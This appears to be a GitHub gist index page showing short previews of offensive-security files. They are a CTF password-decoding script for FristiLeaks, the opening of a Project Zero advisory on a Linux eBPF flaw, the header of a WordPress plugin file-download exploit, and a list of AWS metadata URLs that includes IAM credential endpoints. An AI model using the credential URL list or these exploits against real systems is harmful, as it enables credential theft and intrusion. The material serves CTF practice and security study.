View decryptpass.py
#Wrote this simple function to solve the CTF designed for FristiLeaks v1.3 VulnHub VM | |
#!/usr/bin/python | |
import base64,codecs,sys | |
def decodeString(str): | |
decode = codecs.decode(str[::-1], 'rot13') | |
return base64.b64decode(decode) | |
cryptoResult=decodeString(sys.argv[1]) | |
print cryptoResult |
View 39772.txt
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 | |
In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the | |
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime, | |
unprivileged code can use the bpf() syscall to load eBPF socket filter programs. | |
These conditions are fulfilled in Ubuntu 16.04. | |
When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first | |
function that touches the supplied eBPF instructions is | |
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF |
View 39646.py
#!/usr/bin/env python | |
# Exploit Title: Advanced-Video-Embed Arbitrary File Download / Unauthenticated Post Creation | |
# Google Dork: N/A | |
# Date: 04/01/2016 | |
# Exploit Author: evait security GmbH | |
# Vendor Homepage: arshmultani - http://dscom.it/ | |
# Software Link: https://wordpress.org/plugins/advanced-video-embed-embed-videos-or-playlists/ | |
# Version: 1.0 | |
# Tested on: Linux Apache / Wordpress 4.2.2 |
View cloud_metadata.txt
## AWS | |
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories | |
http://169.254.169.254/latest/user-data | |
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME] | |
http://169.254.169.254/latest/meta-data/ami-id | |
http://169.254.169.254/latest/meta-data/reservation-id | |
http://169.254.169.254/latest/meta-data/hostname | |
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key |